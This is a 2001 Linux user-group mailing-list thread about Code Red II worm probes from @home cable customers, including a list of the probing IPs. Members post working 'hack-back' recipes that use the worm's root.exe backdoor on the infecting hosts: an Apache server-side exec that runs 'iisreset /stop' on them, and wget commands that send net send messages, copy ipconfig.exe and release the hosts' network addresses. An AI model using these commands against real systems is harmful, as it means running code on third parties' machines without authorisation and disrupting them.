[NTLUG:Discuss] @home, Carrollton TX hits on port 80

Jack Snodgrass idiotboy at cybermail.net
Sat Aug 11 09:40:19 CDT 2001 

opon futher review... calling the explorer program to redirect to a
web page may be a bad thing. I've taken that out of my script.

the code red ii worm may install it's own explorer.exe that does bad
things to the system when it's run the first time. I don't want to
be the one that runs explorer the first time.

jack

----- Original Message -----
From: "Jack Snodgrass" <idiotboy at cybermail.net>
To: <discuss at ntlug.org>
Sent: Saturday, August 11, 2001 9:21 AM
Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80


> I don't think that this will work.
>
> I tried, it but lynx called from apache has problems.
> It complains that there is no terminal associated with the lynx process.
>
> I'm using wget -o /dev/null now instead. It might work... but might not.
>
> I tried to access several servers that tried to infect my server but they
> were all busy. None of them were accepting connections. In order for this
> to work, they would have to accept the connection and run the root.exe.
>
> I also used:
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+
> Red+II+worm+and+attacked+my+server"
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+
> and+fix+this+server+ASAP."
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+explorer+http://www.myservername.net/code_red_worm.html"
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+copy+c:\winnt\system32\ipconfig.exe+."
>
> /usr/bin/wget -T 60 -o /dev/null
"http://$REMOTE_ADDR/scripts/ipconfig.exe?+
> /release"
>
> ( I added the line breaks ) and so far, no boxes have tried to access
> my
> http://www.myservername.net/code_red_worm.html
> page. Either I'm doing something wrong... or I think.... the servers
> just don't respond to the messages now.
>
> I guess I could try and run this later when they are less busy infecting
> other machines.
>
>
> jack
>
>
>
> ----- Original Message -----
> From: "Michael Collins" <mhtexcollins at austin.rr.com>
> To: <discuss at ntlug.org>
> Sent: Friday, August 10, 2001 9:20 PM
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
>
>
> > Saw this on alt.os.linux.slackware...thought you guys might be
interested.
> >
> > Open httpd.conf and add:
> > AddType text/html .ida
> > AddHandler server-parsed .ida
> >
> > Restart apache with
> > /var/lib/apache/sbin/apachectl restart
> >
> > Create the file /var/lib/apache/htdocs/default.ida with the following
> > line:
> > <!--#exec cmd="lynx -source
> > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
> >
> > Then sit back and watch the bastard machines shut themselves down.
> >
> > Note: This will not work on the original Code Red. That's the one that
> > displays a string of "N" characters instead of "X" characters.
> >
> >
> >
> >
> >
> >
> >
> > J. Jentink wrote:
> > > I am getting about 20 hits an hour right now over my @home cable in
> > > Carrollton.
> > >>From my web log, the following are the last few hitters: IP and
> > > reverse DNS lookup
> > >   24.0.40.151 cx1221131-b.elcjn1.sdca.home.com
> > >   24.0.164.239 cx586708-a.fed1.sdca.home.com
> > >   24.0.218.136 cx59931-a.dnpt1.occa.home.com
> > >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> > >   24.0.154.161 cx112244-c.cv1.sdca.home.com
> > >   24.0.162.42 cx487547-a.fed1.sdca.home.com
> > >   24.0.212.47 cx47296-a.alsv1.occa.home.com
> > >   24.0.147.21 cx512128-c.dt1.sdca.home.com
> > >   24.0.235.235 c1517939-b.frndl1.wa.home.com
> > >   24.0.49.245 c75556-f.potlnd1.or.home.com
> > >
> > > When I did the reverse DNS on my own IP, it maps to the form..
> > >     c*******-a.croltn1.tx.home.com
> > > Looks like I an getting hammered by the @home folks on the west
> > > coast... California, Washington and Oregon.
> > >
> > > My RD light on the cable modem also blinks constantly. I just
> > > disconnect it when I am not using the internet. What fun.
> > >
> > > j.
> > >
> > >
> > >
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
> > >
> > >
> >
> >
> >
> > --
> > --
> > Michael H. Collins              Admiral: Penguinista Navy International
> > http://www.linuxlink.com        Migration
> > Free Linux Email                http://www.78704.com
> > A great geek girl mp3           http://24.28.86.53
> > This Ain't California http://geekaustin.com/
> >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>

More information about the Discuss mailing list